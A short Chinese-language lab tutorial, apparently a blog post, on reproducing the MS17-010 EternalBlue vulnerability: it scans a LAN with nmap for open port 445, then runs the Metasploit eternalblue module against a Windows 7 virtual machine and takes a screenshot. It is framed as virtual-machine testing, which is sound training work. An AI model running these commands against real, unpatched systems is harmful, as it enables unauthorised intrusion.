使用kali进行漏洞复现【虚拟机测试】

配置需求： 1、攻击机：Kali Linux (IP:192.168.1.100) 2、目标靶机：Winodws7 3、同一局域网 关于局域网的解释:我解释一下，我们这里很多都是测试都是基于内网，局域网，是这样一个情况，你如果想互通，那就一种情况，一种就是建立公网，一种叫做内网穿透。如果新手建议先学逻辑，至于内网穿透，后面再研究。公网这个东西，现在别想，大部分做法都是内网穿透。 我们在扫描设备的时候，因为你进入的是msf像这种，如果你在扫描失败，就先初始化一下。 nmap -sS -Pn 网段/24 或者说db_nmap 在msf里面执行的 我们主要看开放的445端口 假设看到IP地址为192.168.1.6的主机，开启了445端口（open），找到目标靶机后就可以进行第二个步骤 这里注意:有一种可能，对方开启了防火墙，其实最主要不是防火墙，是公网，那个不是让你选择网络么，家庭网络，工作网络，还有公网，那个公网，相对严格，因此啊，那个一定情况下，你关闭了防火墙，你也没用。有这么一种情况。 第一步指令 sudo su msfconsole search ms17-010 老生长谈输入指令 use exploit/windows/smb/ms17_010_eternalblue 攻击模块 show opctions 查看参数 set rhosts 192.168.1.6 最后输入run或者exploit进行攻击 screenshot 关于ip，这个以你们的虚拟主机，为主，跟我的没有关系，另外注意，你们的选择的NAT就NAT桥接就桥接，一定要两台主机支持互相通信。